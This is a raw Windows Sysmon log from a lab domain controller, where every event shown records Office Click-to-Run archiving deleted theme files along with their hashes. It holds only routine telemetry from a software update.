Shared\THEMES16\LAYERS\LAYERS.ELMMD5=3B6744AEFA91318666307267C9D9C5F1,SHA256=F35BA5B9B894FD07D6B92AD1CDE1EC8077C7363C2E672AF3F78F3B0B17E6279D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071148Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.595{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\JOURNAL\THMBNAIL.PNGMD5=F2537FC7251F0425C74E6999858E8FED,SHA256=A6E519107CB2B755687FA8B23F3CF9A314D5AFC066F89FD7A24817AD8F126AED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071147Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.595{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\JOURNAL\PREVIEW.GIFMD5=4BFBDAB48594BCA2AFD04912B7CF4EFD,SHA256=A3790CCF62DECCF6E326E3FA98DC0D3C8D4C7B2448BBECE75F77FE965FE6AD3E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071146Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.595{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\JOURNAL\JOURNAL.INFMD5=AF0C2E5286196F1ABC042242FC12FF86,SHA256=E76FD736C806F90646ACF9157D136217BCAA716AF602846D68741E3468E15593,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071145Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.595{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\JOURNAL\JOURNAL.ELMMD5=A1B02BB8402D95A5EF804E58FB49A2CC,SHA256=D1549795DB2D14202359B525EF4625C8CC270133E830599AB965849726159E8F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071144Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.595{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\IRIS\THMBNAIL.PNGMD5=B5F9B548969F1FD9411D843AEA0554F0,SHA256=6E986113ABBF5514783B7A181CEEDF2DC0E390232DCB0F889EE27C9B8945D3E4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071143Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.579{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\IRIS\PREVIEW.GIFMD5=220B4FEA8D6AF78D77A49E36FEE9A7B7,SHA256=48918B5EBFAD3FBD13FDF360E68BD529CFB794E416D4CDCF62B755374543A5CB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071142Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.579{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\IRIS\IRIS.INFMD5=1477FB48B40B9157483059AA9C1B0B99,SHA256=93C60DB5D99F8E1854FD8C266D919A9251ACAAC912054F7ECEC9EB8219E1BF0B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071141Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.579{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\IRIS\IRIS.ELMMD5=063CC061D38B72A80DCA3DFD536BC56A,SHA256=CF3B4A9F646C121FBEAB3309B2BBE68503E21C7AB685CF7770FAC97A928D155B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071140Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.579{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\INDUST\THMBNAIL.PNGMD5=8A099C27A764B27F3D839E82BC7252D8,SHA256=DA9447159B9892E7F849944A94F238DDECD0936FA2228C76970603BF2D5626C7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071139Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.579{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\INDUST\PREVIEW.GIFMD5=2A8FAAF864EEA471F96DE632BE07B89A,SHA256=1A40281463C5E618794E814A96FE3F2E006BC09375AB92532F683D3D0DC20787,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071138Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.579{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\INDUST\INDUST.INFMD5=2E666809C30A3DB17E350F6EED52A910,SHA256=5F74BE1B10D8BD772DCBD4A7110E7174B6E144396E9695F94933DB84A8A21CC6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071137Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.579{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\INDUST\INDUST.ELMMD5=0C24845FAF2E207146D5A2E8AA3B0789,SHA256=3CF08CF5BA52A2D9AF8742C91B41801A68DA01BDFBBD2941D1F0A133EE5CDAAF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071136Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.579{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\ICE\THMBNAIL.PNGMD5=9F75EBE4A41BD9946116AF8143474EDA,SHA256=A0A9C34DB7D06385D9A70B82B0C36EBECECCF19CD69B3E8383AF5A9C87FB1C4C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071135Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.579{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\ICE\PREVIEW.GIFMD5=441E29CD847FC047A59D6D312319CCF8,SHA256=A50429EEF83D2B6A8BE251A847C48DD96C5029BF5D3E473D309BAF7B473DFE72,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071134Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.563{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\ICE\ICE.INFMD5=77546C16158CB11DAF76644D0E4629DD,SHA256=7BD791DB0574EE0E755A903ED174B13FCF2E3193F23D9FD3CE044D69100B7D80,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071133Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.563{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\ICE\ICE.ELMMD5=092DDAB504C079157B75D01EF8D978FB,SHA256=AC4DCCE8E9D6BACC0B0B08054C4C8EB2684EE3FE8B4CF9CAF3BB8B09029360AA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071132Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.563{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\EXPEDITN\THMBNAIL.PNGMD5=970602E0E9BED12A5023EC38BB4104B9,SHA256=4EABF3B176EDD992B387D2DBA591D534B32F948E0A1762E1DC924AD47E061A5D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071131Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.563{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\EXPEDITN\PREVIEW.GIFMD5=48FBB1DF538D4B6512F8A52F740EEB0F,SHA256=B1F2DCDB59A14305B5DD99B1405EECB3C5F5CB314E6FB332B5D271C892CF390E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071130Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.563{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\EXPEDITN\EXPEDITN.INFMD5=A7127CD687A93EA08AE2640FAEB68E6C,SHA256=CB0A2BC89F5A53EFC8AF28EBFD2DC41CB53C7ACF305233996081E6014857CDF4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071129Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.563{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\EXPEDITN\EXPEDITN.ELMMD5=4B03B8F1EF2C0DEFBDDA5864FD4DE573,SHA256=131CE38EB5B4912880B187A52C76A55829FA1F97682FDA6ACE319DF0A28C4F28,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071128Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.563{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\EVRGREEN\THMBNAIL.PNGMD5=69802AA9F40EDE774F54C342AA482B74,SHA256=05F0C81C667434B2CAA16475F4F4F7F712B481E582306A9E8444567A90C871EA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071127Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.563{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\EVRGREEN\PREVIEW.GIFMD5=C540A4ADD53A9661EEC418CC36CC3EC5,SHA256=F44FAE726574F4CF18889A145621F485C77554D71011339DD27DF6A02B2271FA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071126Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.548{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\EVRGREEN\EVRGREEN.INFMD5=C92BD303E6FB2FBBCAE58C94ED21AC78,SHA256=9A9364CA10B291113B5A0D30870B9A92B3F8B1DA0C5E6892959258B7BF5A4172,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071125Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.548{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\EVRGREEN\EVRGREEN.ELMMD5=5B788ABD6071AA050817EA549249FBBE,SHA256=D6D3B8978813762372ABD41E36D7DF3689EBA2C658E64295B4C2F42739E4A8C6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071124Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.548{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\EDGE\THMBNAIL.PNGMD5=40AFEADD296FD403DE6819C7110D9F00,SHA256=73567FDDB1C83375FB44DF38FC8DBF7ABB719454B0CA696F49B2B5CBC665E15F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071123Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.548{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\EDGE\PREVIEW.GIFMD5=FB84CD5AA67231103447A624AC04F5D6,SHA256=F3AF62927DBCBCE5E3E0E917208ED584361997C496DB39B89302F79BF34012B0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071122Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.548{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\EDGE\EDGE.INFMD5=6D5AE186C103E0F8DC6C684580298D40,SHA256=5369AA9E371D87A983C2061949301F3A069796EBA17BB13238FA93410A30AC1C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071121Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.548{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\EDGE\EDGE.ELMMD5=54984F6039614F5DE584B3F81A6ADC5E,SHA256=92AA3C4317A4D9B2D47A0B13115943CF7FFD9063E9BC1AA979D903FC156E6284,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071120Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.548{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\ECLIPSE\THMBNAIL.PNGMD5=8FD0BAE027A02A1B9F8DA12BDFFF65B1,SHA256=35D99BA1C3340D3BBBFA929D157C5534BBD465442F3D204E8531665907F4EACF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071119Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.548{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\ECLIPSE\PREVIEW.GIFMD5=729EE4A58D9909ACF7D5C9C24D5520C6,SHA256=3E928BBAB08D67EADF530BBC4987BC74CC9CFD82B83E27F301817D4C9706F5D9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071118Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.548{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\ECLIPSE\ECLIPSE.INFMD5=EEFEEE53ED52350B376B8EEC2669A15E,SHA256=7C64556762B100164FA62B69F5205140CFFBB66F1043101A7FC53944F416C362,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071117Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.548{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\ECLIPSE\ECLIPSE.ELMMD5=3ADB926FBF3CB4D7658DAF59AD98B990,SHA256=2B150C898ACF6BBB1B693CCC53188F78AB5A483C44A0365B008CF8014ED24856,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071116Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.532{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\ECHO\THMBNAIL.PNGMD5=70525BB4021AD636B5891731299DCC03,SHA256=CF81E6BD2BCC2A200D5B119761D7AF891C75F49917371E777D0EB90B8A5BFF87,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071115Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.532{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\ECHO\PREVIEW.GIFMD5=6E3A36F976D7AACBBACE25B9DD22F6DF,SHA256=B80C973BFF39F1693FEF733FEA91582608FF7044D113C6520CC5F88795FE6CF3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071114Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.532{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\ECHO\ECHO.INFMD5=394800900F0EE48F9C3BDC4CD0757048,SHA256=A951DFB442C9B71631667159525288624C40EAC7C456B7686496298102A0D3EA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071113Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.532{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\ECHO\ECHO.ELMMD5=B150B21A1D4D8BA1A1300E3D444D85F3,SHA256=1BADF28294C35F858E22A1F78D066312FC7652C4450DFD031E8EB713198CC715,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071112Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.532{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\DEEPBLUE\THMBNAIL.PNGMD5=152EBDA8AFE5F294F9D12F65F2455FCE,SHA256=DDDC4D5CF18C5C39FD0EFCBFF8EDDFC4B4F9CD64947EBB210D4BF26317EB9314,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071111Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.532{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\DEEPBLUE\PREVIEW.GIFMD5=4C99AE7A0A801A80AA7BDE66D5D4A865,SHA256=8BB1D4718FC8A0F828815AC7B51E3FFD14AF45DB3D64CB442067697326E7233F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071110Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.532{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\DEEPBLUE\DEEPBLUE.INFMD5=366A36D9847A942B72433117CBA2A2B2,SHA256=650A9BBB3AFD2A94301FE65E5B7EB880A28B7908A413BD59C2905C5F9C59C98F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071109Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.532{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\DEEPBLUE\DEEPBLUE.ELMMD5=5B967D97116AB63255638404647B8650,SHA256=15CF48996B2BADDD2A383CC2BC0BCA7C485D2DCE14DFCE54FFC1C05A399A8953,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071108Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.516{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\CONCRETE\THMBNAIL.PNGMD5=74C90A4F1D2F5CC26D9715E448B82B35,SHA256=A6167613EB70EBA0CBD2D2BC428B430714EBAEF7A858A08B4EDEBCD3599C4A73,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071107Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.516{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT 